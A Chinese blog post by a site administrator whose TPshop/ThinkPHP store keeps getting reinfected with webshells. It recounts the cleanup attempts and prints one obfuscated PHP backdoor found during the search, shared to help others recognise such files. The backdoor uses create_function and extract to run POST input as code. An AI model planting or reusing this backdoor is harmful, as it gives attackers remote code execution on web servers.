TPshop商城被挂马了 一直清理不干净
使用的老板Tpshop商城,因为改了框架,所以也一直没能升级,可能之前版本有漏洞吧!一直也未能关注官方的具体升级情况及漏洞情况,再加上THINKPHP的漏洞风波,客户的一个站点不幸中弹了,这离发现挂马到现在也有一段时间了,之前把源码下载下来反复搜索了一番,将可以的文件都删除了,并且把THINKPHP升级到了最新版本,并且在网上查看了tpshop的漏洞信息,也在本站点寻得源码查看,已经被补上了,可是网站还是被接二连三的被修改,无奈之下只好逐个目录查询,发现可以文件删之;
在搜索文件的时候发现了好多隐藏至深的马,再次提供出来给有需要朋友:
1 2 3 4 5 6 7 8 |
<?php function fun2(){ $b=$_POST; return @($b[save]); } @extract(array(b=>create_function(NULL,fun2()))); @extract(array(c=>$b())); ?>hello |
看看这个已经不是几年前使用简单的eval来操作了,换了N代变种,如果不是一个目录一个目录的查找凭特征码怎能找到,还想过以马找马,可是最终都未能找全,看来现在的黑客们为了能得到一个站点那可真是煞费苦心啊。
好吧也怪自己并没有很好的分配每个目录的权限,只怪自己太懒了!